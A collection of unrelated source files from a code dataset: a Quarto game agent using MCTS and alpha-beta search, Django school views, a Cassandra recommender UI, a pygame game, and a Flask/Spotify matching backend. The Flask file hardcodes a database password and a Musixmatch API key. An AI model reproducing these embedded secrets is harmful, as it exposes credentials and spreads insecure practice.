def scores(self,state : Quarto):\n if state.check_finished():\n return -1\n \n max_value = max(self.root.children.values(), key=lambda n: n.N).N\n max_nodes = [n for n in self.root.children.values() if n.N == max_value]\n best_child = random.choice(max_nodes)\n return best_child.move \n \n '''GET AVAILABLE PIECES TO SELECT'''\n def get_available_pieces(self,state:Quarto)->set:\n pieces = set(range(16))\n pieces_on_board = set()\n board = state.get_board_status()\n for i,j in zip(np.where(board != -1 )[0],np.where(board != -1 )[1]): \n \n pieces_on_board.add(board[i,j])\n if len(self.forbidden_pieces) == 0 :\n return pieces - pieces_on_board\n else : \n for piece in self.forbidden_pieces : \n pieces.remove(piece)\n self.forbidden_pieces= list()\n return pieces - pieces_on_board\n \n def choose_piece(self)-> int:\n self.time_limit = 15\n phase = True \n state = deepcopy(self.root_state)\n board = state.get_board_status() \n if len(board[board != -1]) >= 3 : \n self.__prior_knowledge(state) \n self.search(state,phase,True)\n move =self.scores(state)\n self.root = Node(None ,None,None ,True)\n print(f\" time : {self.run_time}, roll 
outs : {self.num_rollouts}\")\n\n return move\n \n \n '''KNOWLEDGE BASED APPROACH'''\n ''' FIND THE PIECES THAT COULD LEAD TO A FINISHING MOVE THUS LOSING THE GAME , HOWEVER THIS APPLIES TO THE NODES CONNECTED TO THE ROOT NODE'''\n ''' IF ALL AVAILABLE PIECES COULD LEAD TO A ¨POTENTIAL LOSS , JUST CANCEL THIS PROCESS AND WISH THAT THE OPPONENT MAKES A MISTAKE '''\n def __prior_knowledge(self,state:Quarto)-> None: \n available_pieces = self.get_available_pieces(state)\n\n for piece in available_pieces : \n if self.heuristic_2(state,piece) : \n\n self.forbidden_pieces.append(piece)\n if len(self.forbidden_pieces) == len(available_pieces): \n self.forbidden_pieces = list()\n '''AVOID DOING MCTS IF WE HAVE THE OPPORTUNITY TO PERFORM A GAME FINISHED MOVE'''\n def __finishing_move(self, state :Quarto)->tuple[bool,tuple]: \n board = state.get_board_status()\n available_positions = [(i,j) for i,j in zip(np.where(board == -1)[0],np.where(board == -1)[1]) ]\n for pos in available_positions:\n temp_state = deepcopy(state)\n temp_state.place(*pos)\n if self.heuristic_1(temp_state,pos): \n\n return (True,pos)\n return (False , None)\n \n def place_piece(self)->tuple[int,int] : \n \n self.time_limit = 15\n phase = False\n state = deepcopy(self.root_state)\n board = state.get_board_status()\n if len(board[board != -1]) > 3 : \n outcome,move=self.__finishing_move(state)\n if outcome: \n return move \n self.search(state,phase,True)\n move =self.scores(state)\n\n self.root = Node(None ,None,None ,True)\n print(f\" time : {self.run_time}, roll outs : {self.num_rollouts}\")\n \n return move\n '''METHOD FINDS WHETHER THE GAME IS FINISHED AFTER A PLAYER HAS PLACED A PIECE ON THE BOARD'''\n @staticmethod\n def heuristic_1(state :Quarto,move : tuple)-> bool : \n board = state.get_board_status()\n row = board[move[0]]\n pieces = row != -1 \n \n if sum(pieces) ==4 : \n if reduce(and_, row) != 0 or reduce(and_, row ^ 15) != 0:\n return True \n column = board[:,move[1]]\n pieces = column != -1\n \n if sum(pieces) == 4 : \n if reduce(and_ , column) != 0 or reduce(and_ , column ^ 15) != 0 : \n return True \n \n if (move[0] == move[1]) or (3-move[0] == move[1]):\n for diag in [board.diagonal() , board[::-1].diagonal()]: \n pieces = diag != -1\n if sum(pieces) == 4 : \n if reduce(and_, diag)!= 0 or reduce(and_ , diag ^15 ) != 0 : \n return True \n return False \n '''THIS METHOD TAKES TAKES THE BOARD STATUS AND A PIECE, TO FIND WHETHER THE PIECE SELECTED COULD LEAD TO FINISHING MOVE'''\n @staticmethod \n def heuristic_2(state: Quarto, move : int )-> bool : \n board = state.get_board_status()\n for row in board: \n pieces = row != -1\n if sum(pieces)==3: \n row_temp = deepcopy(row)\n row_temp[np.where(pieces == False)] = move \n if reduce(and_, row_temp) != 0 or reduce(and_, row_temp ^ 15) != 0:\n return True\n for col in board.T : \n\n pieces = col != -1 \n if sum(pieces) == 3: \n col_temp = deepcopy(col)\n col_temp[np.where(pieces == False)] = move\n if reduce(and_, col_temp) != 0 or reduce(and_, col_temp ^ 15) != 0: \n return True\n for diag in [board.diagonal(), board[::-1].diagonal()]: \n diag = np.array(diag)\n pieces = diag != -1 \n if sum(pieces)==3 : \n diag_temp = deepcopy(diag)\n diag_temp[np.where(pieces == False)] = move\n if reduce(and_,diag_temp) !=0 or reduce(and_,diag_temp^15) != 0 : \n return True\n return False \n \n '''MIN-MAX WITH ALPHA BETA PRUNING'''\n '''Due to the low depth of our search for computational reasons , min-max can only find forced wins and avoid forced losses, if\n possible, within its 
search horizon. '''\n def alpha_beta(self,state : Quarto ,alpha : float , beta : float , MaximizingPlayer : bool , phase : bool,depth : int, move) :\n \n if depth >= 3 and not phase :\n return int(self.heuristic_2(state,move)) if MaximizingPlayer else -int(self.heuristic_2(state))\n elif depth >=3 and phase : \n return int(self.heuristic_1(state,move)) if MaximizingPlayer else -int(self.heuristic_1(state,move))\n \n if state.check_finished() : \n return 0 \n if phase : \n if self.heuristic_1(state,move) : \n return 1 if MaximizingPlayer else -1\n moves = self.get_available_pieces(state)\n else : \n board = state.get_board_status()\n moves =[ (i,j) for i,j in zip(np.where(board == -1)[0],np.where(board == -1)[1]) ] \n \n scores = list() \n if MaximizingPlayer : \n player = MaximizingPlayer ^ phase \n for i in moves : \n temp_state = deepcopy(state) \n if phase :\n temp_state.select(i) \n else :\n temp_state.place(*i)\n evaluation = self.alpha_beta(temp_state,alpha , beta ,player,not phase, depth+1 ,i ) \n scores.append(evaluation)\n alpha = max(alpha , evaluation)\n if beta <= alpha : \n break \n return max(scores)\n else : \n player = MaximizingPlayer ^ phase \n for i in moves : \n temp_state = deepcopy(state)\n if phase :\n temp_state.select(i) \n else :\n temp_state.place(*i)\n evaluation = self.alpha_beta(temp_state,alpha , beta , player , not phase, depth+1,i)\n scores.append(evaluation)\n beta = min(beta , evaluation)\n if beta <=alpha : \n break \n return min(scores)\n \n \n ","repo_name":"aminmbare/MCTS-QUARTO","sub_path":"quarto/quarto/MCTS_MINMAX.py","file_name":"MCTS_MINMAX.py","file_ext":"py","file_size_in_byte":13230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37965415351","text":"from django.db.models.fields import EmailField\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.files.storage import FileSystemStorage\nfrom .models import ExamScore, AllStudent, Profile\n\n\n# Create your views here.\n\ndef HomePage(request):\n #return HttpResponse('
Hello Robinoud
')\n return render(request, 'school/home.html')\n\ndef AboutPage(request):\n return render(request, 'school/about.html')\n\ndef ContactUs(request):\n return render(request, 'school/contactus.html')\n\ndef ShowScore(request):\n score = ExamScore.objects.all() # ดึงค่า จาก DB มาทั้งหมด\n\n context = {'score' : score}\n\n return render(request, 'school/showscore.html', context)\n\ndef Register(request):\n\n if request.method == 'POST':\n data = request.POST.copy()\n first_name = data.get('first_name')\n last_name = data.get('last_name')\n email = data.get('email')\n password = data.get('password')\n\n newuser = User()\n newuser.username = email\n newuser.first_name = first_name\n newuser.last_name = last_name\n newuser.email = email\n newuser.set_password(password)\n newuser.save()\n # from django.shortcuts import redirect\n return redirect('home-page')\n\n return render(request, 'school/register.html')\n\n############################ Search Page ###################################\n@login_required\ndef SearchStudent(request):\n # MODELS.object.all() ดึงค่ามาทั้งหมด\n # MODELS.object.get(student_id = '6300001') ดึงค่าแค่ตัวเดียว หากเกิน จะ error\n # MODELS.object.filter(level = 'ม.1') ดึงค่ามาหลายค่า\n if request.method == 'POST' and request.FILES['photoprofile']:\n data = request.POST.copy()\n searchid = data.get('search') \n print(searchid, type(searchid))\n try:\n result = AllStudent.objects.get(student_id = searchid)\n print('RESULT', result)\n context = {'result':result,'check':'found'}\n except:\n context = {'result':'ไม่มีข้อมูลในระบบ','check':'notfound'}\n\n return render(request, 'school/search.html', context)\n\n return render(request, 'school/search.html')\n\n\n############################ Edit Profile ###################################\n@login_required\ndef EditProfile(request):\n\n username = request.user.username\n current = User.objects.get(username=username)\n\n\n if request.method == 'POST':\n data = request.POST.copy()\n first_name = data.get('first_name')\n last_name = data.get('last_name')\n email = data.get('email')\n\n myprofile = User.objects.get(username=username)\n try:\n setprofile = Profile.objects.get(user=myprofile)\n except:\n setprofile = Profile()\n setprofile.user = myprofile\n\n ####### file system ########\n file_image = request.FILES['photoprofile']\n file_image_name = file_image.name\n fs = FileSystemStorage()\n filename = fs.save(file_image_name, file_image) \n upload_file_url = fs.url(filename)\n setprofile.photoprofile = upload_file_url[6:]\n setprofile.save()\n\n ####### \n myprofile.username = email\n myprofile.first_name = first_name\n myprofile.last_name = last_name\n myprofile.email = email\n myprofile.save()\n\n\n # from django.shortcuts import redirect\n return redirect('editprofile-page')\n\n context = {'data':current}\n return render(request, 'school/editprofile.html',context)","repo_name":"robinoud/djangoschool","sub_path":"djangoschool/school/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20816407171","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.template import loader\n\n\nfrom cassandra.cqlengine import connection\nfrom cassandra.cqlengine.management import sync_table\nfrom cassandra.cluster import Cluster\nimport models\nfrom django.http import HttpResponse\nfrom django.db import connection\nimport logging\nlogger = logging.getLogger(__name__)\nfrom 
gender_detector import GenderDetector\nimport re\n\ndef connect():\n cluster = Cluster(['127.0.0.1'])\n session = cluster.connect()\n session.set_keyspace('prs')\n \ndef index(request):\n connect()\n cursor = connection.cursor()\n rows = cursor.execute(\"SELECT id, user_gid, precision, recall, username, gender FROM prs.recommendation where common_shelves_retrieved=true\") \n users=sorted(rows, key=lambda k: k['precision'], reverse=True) \n detector = GenderDetector('us')\n for i, user in enumerate(users):\n name=user['username'].replace('[', '').split(\" \")\n gender=\"\"\n try:\n gender=detector.guess(name[0])\n except Exception as e:\n gender=\"unknown\"\n\n new_user=dict(models.Recommendation( user_gid=user['user_gid'], gender=gender,precision=user['precision'], recall=user['recall'], username=user['username']))\n users[i]=new_user\n return render(request, 'recom/index.html', {'users': users})\n\ndef user(request, user_id): \n connect()\n user=dict(models.Recommendation.get(user_gid=user_id))\n name=user['username'].replace('[', '').split(\" \")\n detector = GenderDetector('us')\n gender=\"\"\n try:\n gender=detector.guess(name[0])\n except Exception as e:\n gender=\"unknown\"\n user['gender']=gender\n for j, book in enumerate(user['books_details_recommended']):\n for i, shelve in enumerate(book['list_shelves']):\n for best_shelve in user['most_common_shelves']:\n if(best_shelve.shelve==shelve.shelve):\n last_shelve=user['books_details_recommended'][j]['list_shelves'][i]\n new_shelve=models.shelve(count=last_shelve.count,votes=last_shelve.votes, gid=last_shelve.gid,\n best=True,shelve=last_shelve.shelve)\n user['books_details_recommended'][j]['list_shelves'][i]=new_shelve\n return render(request, 'recom/user.html', {'user': user}) \n\ndef book(request, book_id):\n connect()\n users = [dict(user) for user in Books.objects(gid=book_id)]\n return render(request, 'recom/book.html', {'users': users}) \n\n\n","repo_name":"Simone-cogno/MT-Product-Recommender-System_improved-with-social-network-information","sub_path":"Sources/webui/gr_recommendation/recom/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70319281707","text":"import pygame,sys\npygame.init()\n\nclass Player:\n\n\tdef __init__(self,rect):\n\t\tself.rect = pygame.Rect(rect)\n\t\tself.y = self.rect.y\n\t\tself.image = pygame.Surface((rect[2],rect[3]))\n\t\tself.image.fill((0,0,0))\n\t\tself.jump = False\n\t\tself.fall = False\n\t\tself.vel = 0\n\n\tdef draw(self,Game):\n\t\tif self.jump:\n\t\t\tself.vel -= 1\n\t\t\tself.rect.y += self.vel\n\t\t\tif self.vel == -15:\n\t\t\t\tself.jump = False\n\t\t\t\tself.vel = 0\n\t\telif self.fall:\n\t\t\tself.vel = 5\n\t\t\tself.rect.y += self.vel\n\t\t\tif self.rect.y > self.y:\n\t\t\t\tself.rect.y = self.y\n\t\t\t\tself.fall = False\n\t\telif self.rect.y < 0:\n\t\t\tself.fall = True\n\t\telif self.rect.y < self.y:\n\t\t\tself.vel = 1\n\t\t\tself.rect.y += self.vel\n\t\tGame.screen.blit(self.image,(self.rect.x,self.rect.y))\n\nclass Obstacle:\n\n\tdef __init__(self,rect):\n\t\tself.rect = pygame.Rect(rect)\n\t\tself.image = pygame.Surface((rect[2],rect[3]))\n\t\tself.image.fill((255,0,0))\n\t\n\tdef draw(self,Game):\n\t\tif self.rect.x == Game.player.rect.x and self.rect.y == Game.player.rect.y:\n\t\t\tGame.lose()\n\t\tGame.screen.blit(self.image,(self.rect.x,self.rect.y))\n\nclass Aviator:\n\n\tdef __init__(self,rect):\n\t\tself.rect = 
pygame.Rect(rect)\n\t\tself.image = pygame.Surface((rect[2],rect[3]))\n\t\tself.image.fill((0,255,0))\n\t\tself.bullets = []\n\n\tdef shoot(self):\n\t\tself.bullets.append(pygame.Rect((self.rect.x,self.rect.y + int(self.rect.height / 2) - 5,self.rect.width,10)))\n\n\tdef draw(self,Game):\n\t\tplayer = Game.player.rect\n\t\tfor bullet in self.bullets:\n\t\t\tbullet.x -= 5\n\t\t\tif (bullet.left <= player.left <= bullet.right or bullet.left <= player.right <= bullet.right) and \\\n\t\t\t(bullet.top <= player.top <= bullet.bottom or bullet.top <= player.bottom <= bullet.bottom):\n\t\t\t\tGame.lose()\n\t\t\tGame.screen.fill((0,0,255),bullet)\n\t\tself.rect.y = Game.player.rect.y\n\t\tif Game.total_frames % 30 == 0:\n\t\t\tself.shoot()\n\t\tGame.screen.blit(self.image,(self.rect.x,self.rect.y))\n\nclass Game:\n\n\tdef __init__(self,width = 600,height = 600):\n\t\tpygame.display.set_caption("Light As A Feather")\n\t\tself.SIZE = (width,height)\n\t\tself.screen = pygame.display.set_mode((width,height))\n\t\tself.clock,self.FPS,self.total_frames = pygame.time.Clock(),60,0\n\t\tself.player = Player((125,575,25,25))\n\t\tself.aviator = Aviator((425,575,25,25))\n\t\tself.obstacles = []\n\n\tdef textObjects(self,y,msg,size):\n\t\tfont = pygame.font.Font(None,int(size))\n\t\tsz = font.size(msg)\n\t\treturn font,sz,int(self.screen.get_width() / 2 - sz[0] / 2)\n\n\tdef render(self,y = 5,msg = "Hello World!",size = 30,color = (0,0,0)):\n\t\tfont,size,x = self.textObjects(y,msg,size)\n\t\tself.screen.blit(font.render(msg,True,color),(x,y))\n\n\tdef button(self,y = 5,msg = "Hello World!",size = 30,colors = [(0,200,0),(0,255,0)],func = None):\n\t\tfont,sz,x = self.textObjects(y,msg,size)\n\t\tmouse,click = pygame.mouse.get_pos(),pygame.mouse.get_pressed()\n\t\trect = pygame.Rect((x,y,sz[0],sz[1]))\n\t\tif rect.left <= mouse[0] <= rect.right and rect.top <= mouse[1] <= rect.bottom:\n\t\t\tself.render(y,msg,size,colors[1])\n\t\t\tif any(click):\n\t\t\t\ttry:\n\t\t\t\t\tfunc()\n\t\t\t\texcept TypeError:\n\t\t\t\t\tpass\n\t\telse:\n\t\t\tself.render(y,msg,size,colors[0])\n\n\tdef playAgain(self):\n\t\tGame().start()\n\n\tdef start(self):\n\t\twhile 1:\n\t\t\tself.screen.fill((255,255,255))\n\t\t\tself.render(msg = "Light As A Feather.",size = 50)\n\t\t\tself.button(y = 45,msg = "Play",func = self.run)\n\t\t\tself.button(y = 90,msg = "Rules",func = self.rules)\n\t\t\tpygame.display.flip()\n\t\t\tfor event in pygame.event.get():\n\t\t\t\tif event.type == pygame.QUIT:\n\t\t\t\t\tsys.exit(0)\n\t\t\t\telif event.type == pygame.KEYDOWN:\n\t\t\t\t\tif event.key == pygame.K_p:\n\t\t\t\t\t\tself.run()\n\t\t\t\t\telif event.key == pygame.K_r:\n\t\t\t\t\t\tself.rules()\n\n\tdef rules(self):\n\t\twhile 1:\n\t\t\tself.screen.fill((255,255,255))\n\t\t\tself.render(msg = "Rules",size = 50)\n\t\t\tself.render(y = 45,msg = "Press <w>,<up>,or <space> to jump.",size = 20)\n\t\t\tself.render(y = 90,msg = "Avoid the red pixels and blue bullets.",size = 20)\n\t\t\tself.render(y = 135,msg ="When you hit the top of the screen, you fall rapidly.",size = 20)\n\t\t\tself.render(y = 180,msg = "When you hit the ground, you negate this effect.",size = 20)\n\t\t\tself.render(y = 225,msg = "Press <a>,<left>,<d>,and <right> to go left and right.",size = 20)\n\t\t\tself.button(y = 270,msg = "Play",func = self.run)\n\t\t\tpygame.display.flip()\n\t\t\tfor event in pygame.event.get():\n\t\t\t\tif event.type == pygame.QUIT:\n\t\t\t\t\tsys.exit(0)\n\t\t\t\telif event.type == pygame.KEYDOWN:\n\t\t\t\t\tif event.key ==
pygame.K_p:\n\t\t\t\t\t\tself.run()\n\n\tdef lose(self):\n\t\twhile 1:\n\t\t\tself.screen.fill((255,255,255))\n\t\t\tself.render(msg = \"Good Try.\",size = 50)\n\t\t\tself.render(y = 45,msg = \"Your Score: {}\".format(int(self.total_frames / self.FPS)))\n\t\t\tself.button(y = 90,msg = \"Play Again\",func = self.playAgain)\n\t\t\tpygame.display.flip()\n\t\t\tfor event in pygame.event.get():\n\t\t\t\tif event.type == pygame.QUIT:\n\t\t\t\t\tsys.exit(0)\n\t\t\t\telif event.type == pygame.KEYDOWN:\n\t\t\t\t\tif event.key == pygame.K_p:\n\t\t\t\t\t\tGame().run()\n\n\tdef spawn(self):\n\t\tself.obstacles.append(Obstacle((425,575,25,25)))\n\n\tdef run(self):\n\t\twhile 1:\n\t\t\tkey = pygame.key.get_pressed()\n\t\t\tif any([key[pygame.K_a],key[pygame.K_LEFT]]):\tself.player.rect.x -= 3\n\t\t\tif any([key[pygame.K_d],key[pygame.K_RIGHT]]):\tself.player.rect.x += 3\n\t\t\tself.total_frames += 1\n\t\t\tif self.total_frames % 36 == 0:\n\t\t\t\tself.spawn()\n\t\t\tself.clock.tick(self.FPS)\n\t\t\tself.screen.fill((255,255,255))\n\t\t\tself.render(msg = \"Score: {}\".format(int(self.total_frames / self.FPS)))\n\t\t\tself.player.draw(self)\n\t\t\tself.aviator.draw(self)\n\t\t\tfor obstacle in self.obstacles:\n\t\t\t\tobstacle.rect.x -= 5\n\t\t\t\tobstacle.draw(self)\n\t\t\tpygame.display.flip()\n\t\t\tfor event in pygame.event.get():\n\t\t\t\tif event.type == pygame.QUIT:\n\t\t\t\t\tsys.exit(0)\n\t\t\t\telif event.type == pygame.KEYDOWN:\n\t\t\t\t\tif event.key in [pygame.K_w,pygame.K_UP,pygame.K_SPACE]:\n\t\t\t\t\t\tself.player.jump = True\n\nif __name__ == \"__main__\":\n\tGame().start()","repo_name":"Avedati/PythonGames","sub_path":"games/Light As A Feather.py","file_name":"Light As A Feather.py","file_ext":"py","file_size_in_byte":5746,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"70124222826","text":"import base64\r\nimport json \r\nimport os\r\nimport pandas as pd\r\nimport requests\r\nimport random\r\nimport spotipy\r\nimport time\r\nimport uuid\r\n\r\n\r\nfrom copy import deepcopy\r\nfrom bson.json_util import dumps\r\nfrom dotenv import load_dotenv\r\nfrom flask import Flask, jsonify, redirect, session, request\r\nfrom flask_cors import CORS, cross_origin\r\nfrom flask_session import Session\r\nfrom flask_socketio import SocketIO, send, emit, join_room, leave_room\r\nfrom lyric_generator import *\r\nfrom match import *\r\nfrom pymongo import MongoClient\r\nfrom spotipy.oauth2 import SpotifyOAuth\r\n\r\nTEST_USERS = pd.read_csv(\"test_users.csv\")\r\nDEBUG = True\r\n\r\nload_dotenv()\r\nscope = \"streaming user-read-private user-read-email user-library-read user-library-modify user-read-playback-state user-modify-playback-state\"\r\n\r\nDB_USER = os.environ.get(\"DB_USER\")\r\nREDIRECT = os.environ.get(\"REDIRECT\")\r\nDB_PASSWORD = os.environ.get(\"DB_PASSWORD\")\r\nDB_CLUSTER_URL = os.environ.get(\"DB_CLUSTER_URL\")\r\nSPOTIFY_CLIENT_ID = os.environ.get(\"SPOTIFY_CLIENT_ID\")\r\nSPOTIFY_CLIENT_SECRET = os.environ.get(\"SPOTIFY_CLIENT_SECRET\")\r\nIMGUR_CLIENT_ID = os.environ.get(\"IMGUR_CLIENT_ID\")\r\nIMGUR_CLIENT_SECRET = os.environ.get(\"IMGUR_CLIENT_SECRET\")\r\nauthMechanism = \"DEFAULT\"\r\n\r\nNEW_USER = \"m001-student\"\r\nPASS = \"capstone\"\r\nmongo_uri = f\"mongodb+srv://{DB_USER}:{DB_PASSWORD}@{DB_CLUSTER_URL}/?authMechanism={authMechanism}\"\r\nmongo_uri2 = f\"mongodb+srv://{NEW_USER}:{PASS}@sandbox.679hr.mongodb.net/?authMechanism={authMechanism}\"\r\n\r\nbase_url = \"https://api.musixmatch.com/ws/1.1/\"\r\napi_key 
= \"&apikey=b47d930cf4a671795d7ab8b83fd74471\"\r\n#CORS(app)\r\n\r\nDB_CLIENT = MongoClient(mongo_uri)\r\n\r\napp = Flask(__name__)\r\n\r\napp.config['SECRET_KEY'] = uuid.uuid4().hex\r\napp.config[\"SESSION_COOKIE_NAME\"] = \"Spotify Cookie\"\r\napp.config[\"SESSION_COOKIE_HTTPONLY\"] = False\r\napp.config['SESSION_TYPE'] = 'filesystem'\r\napp.config['SESSION_FILE_DIR'] = './.flask_session/'\r\nsocketio = SocketIO(app,cors_allowed_origins=\"*\")\r\nTOKEN_INFO = \"code\"\r\nCORS(app, resources={r\"/*\":{\"origins\":\"*\"}})\r\nSession(app)\r\n\r\n@socketio.on('join')\r\ndef on_join(data):\r\n room = data\r\n # print(\"room: \" + room)\r\n join_room(room)\r\n\r\n@socketio.on('leave')\r\ndef on_leave(data):\r\n room = data\r\n print(\"I left the room ya hurd: \" + room)\r\n leave_room(room)\r\n \r\n@socketio.on(\"message\")\r\ndef handle_message(message):\r\n # print(\"Received message: \" + message['ms'])\r\n # print(\"I have been triggered\")\r\n emit('my_response', message, broadcast=True)\r\n return None\r\n\r\n@socketio.on(\"connect\")\r\ndef connected():\r\n \"\"\"event listener when client connects to the server\"\"\"\r\n # print(request.sid)\r\n print(\"client has connected\")\r\n emit(\"connect\",{\"data\":f\"id: {request.sid} is connected\"})\r\n\r\ndef create_auth(cache_handler):\r\n return SpotifyOAuth(\r\n scope=scope,\r\n client_id=SPOTIFY_CLIENT_ID,\r\n client_secret=SPOTIFY_CLIENT_SECRET,\r\n redirect_uri=REDIRECT,\r\n cache_handler=cache_handler\r\n )\r\n\r\n@app.route(\"/current_user\", methods=['GET','POST'])\r\n@cross_origin(supports_credentials=True)\r\ndef current_user():\r\n cache_handler = spotipy.cache_handler.FlaskSessionCacheHandler(session)\r\n auth_manager = create_auth(cache_handler)\r\n\r\n sp = spotipy.Spotify(auth_manager=auth_manager)\r\n return json.dumps({\"user\":sp.current_user()})\r\n\r\n@app.route(\"/user_tracks\", methods=['GET','POST'])\r\n@cross_origin(supports_credentials=True)\r\ndef get_tracks():\r\n sp = None\r\n try:\r\n cache_handler = spotipy.cache_handler.FlaskSessionCacheHandler(session)\r\n auth_manager = create_auth(cache_handler)\r\n\r\n sp = spotipy.Spotify(auth_manager=auth_manager)\r\n except:\r\n return {\"msg\":\"no valid logged in user\"}\r\n l = []\r\n for j in range(10):\r\n songs = sp.current_user_saved_tracks(limit=50, offset=j*50)['items']\r\n for i in songs:\r\n if i in l:\r\n return dumps(l)\r\n album = i[\"track\"][\"album\"][\"name\"].replace(\" \", \"-\")\r\n name = i[\"track\"][\"name\"].replace(\" \", \"-\")\r\n im = i[\"track\"][\"album\"][\"images\"][1][\"url\"]\r\n uri = i[\"track\"][\"uri\"]\r\n artist = i[\"track\"][\"artists\"][0][\"name\"].replace(\" \", \"-\")\r\n duration = i[\"track\"][\"duration_ms\"]\r\n item = {\"name\": name, \"image\":im, \"artist\":artist, \"uri\":uri, \"album\":album, \"duration\": duration}\r\n if len(i[\"track\"][\"artists\"]) == 1:\r\n l.append(item)\r\n return dumps(l)\r\n\r\n\r\n@app.route(\"/get_song_words\", methods=['GET','POST'])\r\n@cross_origin(supports_credentials=True)\r\ndef getLyrics():\r\n bdy = request.get_json()\r\n count = len(bdy)\r\n while count:\r\n try:\r\n index = random.randint(0,len(bdy)-1)\r\n song = bdy[index]\r\n bdy.pop(index)\r\n lyric = lyrics(song['name'], song['artist'])\r\n return jsonify(lyric)\r\n except:\r\n count-=1\r\n return {\"msg\":\"Oops... 
Seeming to have difficulty with retrieving lyrics.\"}\r\n\r\n@app.route(\"/create_user\", methods=['GET','POST'])\r\n@cross_origin(supports_credentials=True)\r\ndef create_user():\r\n user_data = request.get_json()\r\n db = DB_CLIENT[\"main\"]\r\n user = db.accounts.insert_one(user_data)\r\n likes = db.likes.insert_one({\r\n \"user\":user_data[\"spotify_id\"],\r\n \"liked\":[]\r\n })\r\n return {}\r\n\r\n@app.route(\"/update_user\", methods=['GET','PUT'])\r\n@cross_origin(supports_credentials=True)\r\ndef update_user():\r\n user_data = request.data.decode(\"utf-8\")\r\n user_data = json.loads(user_data)\r\n user_data.pop('_id', None)\r\n db = DB_CLIENT[\"main\"]\r\n user = db.accounts.replace_one({\"spotify_id\":user_data[\"spotify_id\"]},user_data)\r\n return {}\r\n\r\n# have a threshold of when to call it again (first time should be on account creation)\r\n@app.route(\"/match\", methods=['GET','POST'])\r\n@cross_origin(supports_credentials=True)\r\ndef match():\r\n # just have it find users here\r\n user_data = request.data.decode(\"utf-8\")\r\n user_data = json.loads(user_data)\r\n user_data.pop('_id', None)\r\n client = MongoClient(mongo_uri)\r\n db = client[\"main\"] \r\n bruh = db.accounts.find({\"spotify_id\":{\"$ne\":user_data[\"spotify_id\"]},\"cluster\":user_data[\"cluster\"], \"isActive\":True},{\"_id\":0}).limit(1000)\r\n l =[]\r\n for i in bruh:\r\n l.append(i)\r\n print(l)\r\n if not len(l):\r\n raise Exception(\"No User Found\")\r\n return {\"user\":l}\r\n\r\n\r\n@app.route(\"/get_all_users\", methods=['GET','POST'])\r\n@cross_origin(supports_credentials=True)\r\ndef allUser():\r\n client = MongoClient(mongo_uri)\r\n db = client[\"main\"]\r\n users = db.accounts.find({})\r\n peeps = []\r\n for d in users:\r\n peeps.append(d)\r\n return dumps({\"allUsers\":peeps})\r\n\r\n\r\n@app.route(\"/kmeans\", methods=['GET','POST'])\r\n@cross_origin(supports_credentials=True)\r\ndef kmeans_train():\r\n now = time.time()\r\n user_data = request.data.decode(\"utf-8\")\r\n user_data = json.loads(user_data)\r\n user_data.pop('_id', None)\r\n\r\n db = DB_CLIENT[\"main\"]\r\n\r\n data = None\r\n if DEBUG:\r\n data = debug_create_genre_list(TEST_USERS)\r\n else:\r\n data = create_genre_list()\r\n data = data[list(data.keys())[0]]\r\n data[\"spotify_id\"] = user_data[\"spotify_id\"]\r\n\r\n cluster = kmeans(data, TEST_USERS)\r\n if DEBUG:\r\n cluster = 0\r\n user_data[\"cluster\"] = cluster\r\n\r\n db.accounts.replace_one({\"spotify_id\":user_data[\"spotify_id\"]},user_data)\r\n\r\n print(time.time() - now, \"END OF ENDPOINT\")\r\n return json.dumps({\"kmeans\":cluster})\r\n\r\n@app.route(\"/refresh\", methods=['GET','POST'])\r\n@cross_origin(supports_credentials=True)\r\ndef refresh():\r\n cache_handler = spotipy.cache_handler.FlaskSessionCacheHandler(session)\r\n auth_manager = create_auth(cache_handler)\r\n\r\n sp = spotipy.Spotify(auth_manager=auth_manager)\r\n\r\n token_info = sp.refresh_access_token(token_info[\"refresh_token\"])\r\n\r\n return json.dumps(\r\n {\r\n \"accessToken\" : token_info[\"access_token\"],\r\n \"refreshToken\" : token_info[\"refresh_token\"],\r\n \"expiresIn\" : token_info[\"expires_in\"]\r\n })\r\n\r\n@app.route(\"/spotify\", methods=['GET','POST'])\r\n@cross_origin(supports_credentials=True)\r\ndef spotify():\r\n code = request.data.decode(\"utf-8\")\r\n cache_handler = spotipy.cache_handler.FlaskSessionCacheHandler(session)\r\n sp = create_auth(cache_handler)\r\n\r\n session.clear()\r\n token_info = sp.get_access_token(code)\r\n\r\n session[TOKEN_INFO] = 
token_info\r\n session.modified = True\r\n\r\n return json.dumps(\r\n {\r\n \"accessToken\" : token_info[\"access_token\"],\r\n \"refreshToken\" : token_info[\"refresh_token\"],\r\n \"expiresIn\" : token_info[\"expires_in\"]\r\n })\r\n\r\n@app.route(\"/user\", methods=['GET','POST'])\r\n@cross_origin(supports_credentials=True)\r\ndef user():\r\n user_id = request.data.decode(\"utf-8\")\r\n db = DB_CLIENT[\"main\"]\r\n\r\n user = db.accounts.find_one({\"spotify_id\":user_id})\r\n\r\n return dumps({\"user\":user})\r\n\r\n@app.route(\"/upload\", methods=['POST'])\r\n@cross_origin(supports_credentials=True)\r\ndef upload():\r\n\r\n file = request.files[\"file\"]\r\n headers = {\"Authorization\": \"Client-ID \"+ IMGUR_CLIENT_ID}\r\n\r\n b64_image = base64.standard_b64encode(file.read())\r\n data = {'image': b64_image, 'title': str(uuid.uuid4().hex)}\r\n\r\n req = requests.post(url=\"https://api.imgur.com/3/upload.json\", data=data,headers=headers)\r\n if req.status_code!=200:\r\n return {\"code\":404}\r\n link = req.json()[\"data\"][\"link\"]\r\n return {\"code\":200,\"link\":link}\r\n\r\n@app.route(\"/posts\", methods=['GET','POST'])\r\n@cross_origin(supports_credentials=True)\r\ndef posts():\r\n db = DB_CLIENT[\"main\"]\r\n posts = db.posts\r\n if request.method == \"GET\":\r\n return dumps(posts.find().limit(30))\r\n else:\r\n post_data = request.data.decode(\"utf-8\")\r\n post_data = json.loads(post_data)\r\n 